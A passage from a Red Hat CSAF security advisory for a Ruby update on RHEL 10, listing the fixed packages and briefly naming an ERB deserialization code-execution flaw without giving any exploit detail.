|
| Unresolved product id: AppStream-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for ruby is now available for Red Hat Enterprise Linux 10.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:18065",
"url": "https://access.redhat.com/errata/RHSA-2026:18065"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2461369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461369"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_18065.json"
}
],
"title": "Red Hat Security Advisory: ruby security update",
"tracking": {
"current_release_date": "2026-05-18T14:18:22+00:00",
"generator": {
"date": "2026-05-18T14:18:22+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:18065",
"initial_release_date": "2026-05-18T12:50:43+00:00",
"revision_history": [
{
"date": "2026-05-18T12:50:43+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-18T12:50:43+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-18T14:18:22+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-12.el10_1.src",
"product": {
"name": "ruby-0:3.3.10-12.el10_1.src",
"product_id": "ruby-0:3.3.10-12.el10_1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-12.el10_1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-devel-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-devel-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-libs-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-libs-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"product_id": "rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"product": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"product_id": "rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-12.el10_1.aarch64",
"product": {
"name": "rubygem-json-0:2.7.2-12.el10_1.aarch64",
"product_id": "rubygem-json-0:2.7.2-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"product": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"product_id": "rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"product": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"product_id": "rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"product": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"product_id": "rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product_id": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"product_id": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-12.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-12.el10_1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"product_id": "rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"product": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"product_id": "rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"product": {
"name": "rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"product_id": "rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"product": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"product_id": "rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"product": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"product_id": "rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"product": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"product_id": "rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
